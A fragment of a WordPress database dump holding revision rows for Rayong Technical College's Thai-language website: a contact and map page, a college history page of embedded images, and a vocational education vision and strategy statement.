(3091, 3, '2018-06-19 13:22:26', '2018-06-19 06:22:26', '<div class=\"colophon-column\">\r\n<div class=\"copyright\"><strong>วิทยาลัยเทคนิคระยอง Rayong Technical College</strong></div>\r\n</div>\r\n<div class=\"colophon-column\">\r\n<div class=\"site-info\"><strong>086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 </strong></div>\r\n<div class=\"site-info\"><strong>โทร 038-611192 </strong></div>\r\n<div class=\"site-info\"><strong>แฟกซ์ 038-870717</strong></div>\r\n<div><strong>พิกัด <a href=\"https://www.google.co.th/maps/place/12%C2%B040\'00.6%22N+101%C2%B016\'19.1%22E/@12.666835,101.2697803,17z/data=!3m1!4b1!4m6!3m5!1s0x0:0x0!7e2!8m2!3d12.6668354!4d101.2719688?hl=en\">12.666835, 101.271969</a></strong></div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<a href=\"https://www.google.co.th/maps/dir//Rayong+Technical+College,+086%2F13+Taksin+Maharat,+Tambon+Tha+Pradu,+Amphoe+Mueang+Rayong,+Chang+Wat+Rayong+21000/@12.6252505,101.3071709,11.13z/data=!4m9!4m8!1m0!1m5!1m1!1s0x3102fc182fea834b:0x4ed7d262b47bd579!2m2!1d101.2721078!2d12.6669973!3e0?hl=en\"><img class=\"aligncenter wp-image-3089 size-full\" src=\"/wp-content/uploads/2018/06/6-18-2018-1-07-46-PM.png\" alt=\"\" width=\"826\" height=\"584\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-3090\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"1000\" height=\"839\" />', 'แผนที่ตั้งวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '3088-revision-v1', '', '', '2018-06-19 13:22:26', '2018-06-19 06:22:26', '', 3088, 'http://www.technicrayong.ac.th/3088-revision-v1/', 0, 'revision', '', 0),
(3092, 3, '2018-06-19 13:24:50', '2018-06-19 06:24:50', '<div class=\"colophon-column\">\r\n<h3 class=\"copyright\"><strong>วิทยาลัยเทคนิคระยอง Rayong Technical College</strong></h3>\r\n</div>\r\n<div class=\"colophon-column\">\r\n<h3 class=\"site-info\"><strong>086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 </strong></h3>\r\n<h3 class=\"site-info\"><strong>โทร 038-611192 </strong></h3>\r\n<h3 class=\"site-info\"><strong>แฟกซ์ 038-870717</strong></h3>\r\n<h3><strong>พิกัด <a href=\"https://www.google.co.th/maps/place/12%C2%B040\'00.6%22N+101%C2%B016\'19.1%22E/@12.666835,101.2697803,17z/data=!3m1!4b1!4m6!3m5!1s0x0:0x0!7e2!8m2!3d12.6668354!4d101.2719688?hl=en\">12.666835, 101.271969</a></strong></h3>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<a href=\"https://www.google.co.th/maps/dir//Rayong+Technical+College,+086%2F13+Taksin+Maharat,+Tambon+Tha+Pradu,+Amphoe+Mueang+Rayong,+Chang+Wat+Rayong+21000/@12.6252505,101.3071709,11.13z/data=!4m9!4m8!1m0!1m5!1m1!1s0x3102fc182fea834b:0x4ed7d262b47bd579!2m2!1d101.2721078!2d12.6669973!3e0?hl=en\"><img class=\"aligncenter wp-image-3089\" src=\"/wp-content/uploads/2018/06/6-18-2018-1-07-46-PM.png\" alt=\"\" width=\"1500\" height=\"1061\" /></a>\r\n\r\n ', 'แผนที่ตั้งวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '3088-autosave-v1', '', '', '2018-06-19 13:24:50', '2018-06-19 06:24:50', '', 3088, 'http://www.technicrayong.ac.th/3088-autosave-v1/', 0, 'revision', '', 0),
(3093, 3, '2018-06-19 13:24:39', '2018-06-19 06:24:39', '<div class=\"colophon-column\">\r\n<h3 class=\"copyright\"><strong>วิทยาลัยเทคนิคระยอง Rayong Technical College</strong></h3>\r\n</div>\r\n<div class=\"colophon-column\">\r\n<h3 class=\"site-info\"><strong>086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 </strong></h3>\r\n<h3 class=\"site-info\"><strong>โทร 038-611192 </strong></h3>\r\n<h3 class=\"site-info\"><strong>แฟกซ์ 038-870717</strong></h3>\r\n<h3><strong>พิกัด <a href=\"https://www.google.co.th/maps/place/12%C2%B040\'00.6%22N+101%C2%B016\'19.1%22E/@12.666835,101.2697803,17z/data=!3m1!4b1!4m6!3m5!1s0x0:0x0!7e2!8m2!3d12.6668354!4d101.2719688?hl=en\">12.666835, 101.271969</a></strong></h3>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<a href=\"https://www.google.co.th/maps/dir//Rayong+Technical+College,+086%2F13+Taksin+Maharat,+Tambon+Tha+Pradu,+Amphoe+Mueang+Rayong,+Chang+Wat+Rayong+21000/@12.6252505,101.3071709,11.13z/data=!4m9!4m8!1m0!1m5!1m1!1s0x3102fc182fea834b:0x4ed7d262b47bd579!2m2!1d101.2721078!2d12.6669973!3e0?hl=en\"><img class=\"aligncenter wp-image-3089\" src=\"/wp-content/uploads/2018/06/6-18-2018-1-07-46-PM.png\" alt=\"\" width=\"1500\" height=\"1061\" /></a>\r\n\r\n ', 'แผนที่ตั้งวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '3088-revision-v1', '', '', '2018-06-19 13:24:39', '2018-06-19 06:24:39', '', 3088, 'http://www.technicrayong.ac.th/3088-revision-v1/', 0, 'revision', '', 0),
(3095, 3, '2018-06-19 13:26:20', '2018-06-19 06:26:20', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-19 13:26:20', '2018-06-19 06:26:20', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3096, 3, '2018-06-19 13:28:17', '2018-06-19 06:28:17', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignnone size-medium wp-image-1200\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1203\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" />\r\n\r\n<img class=\"alignnone size-medium wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-19 13:28:17', '2018-06-19 06:28:17', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3097, 3, '2018-06-19 13:35:36', '2018-06-19 06:35:36', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<h3><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</h4>\r\n<h3></h3>\r\n<h3><strong>วิสัยทัศน์</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</h4>\r\n<h3></h3>\r\n<h3><strong>พันธกิจ </strong></h3>\r\n<h4>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</h4>\r\n<h4>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</h4>\r\n<h4>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</h4>\r\n<h4>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</h4>\r\n \r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</h4>\r\n<h4>1. พัฒนาครูและบุคลากรอาชีวศึกษา</h4>\r\n<h4>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</h4>\r\n<h4>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</h4>\r\n<h4>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</h4>\r\n<h4>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</h4>\r\n<h4>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</h4>\r\n<h4>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</h4>\r\n<h4>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</h4>\r\n<h4>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</h4>\r\n \r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></h3>\r\n<h4>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</h4>\r\n<h4>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</h4>\r\n<h4>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</h4>\r\n<h4>3. พัฒนาฐานข้อมูลความร่วมมือ</h4>\r\n<h4>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</h4>\r\n<h4>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></h3>\r\n<h4>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</h4>\r\n<h4>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</h4>\r\n<h4>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</h4>\r\n<h4>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</h4>\r\n<h4>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</h4>\r\n<h4>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</h4>\r\n<h4>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</h4>\r\n<h4>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</h4>\r\n<h4>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</h4>\r\n<h4>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</h4>\r\n<h4>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></h3>\r\n<h4>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</h4>\r\n<h4>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</h4>\r\n<h4>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</h4>\r\n<h4>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</h4>\r\n<h4>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></h3>\r\n<h4>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</h4>\r\n<h4>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</h4>\r\n<h4>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</h4>\r\n<h4>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></h3>\r\n<h4>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</h4>\r\n<h4>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</h4>\r\n<h4>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</h4>\r\n<h4>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</h4>\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-06-19 13:35:36', '2018-06-19 06:35:36', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0),
(3098, 3, '2018-06-19 13:37:52', '2018-06-19 06:37:52', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" 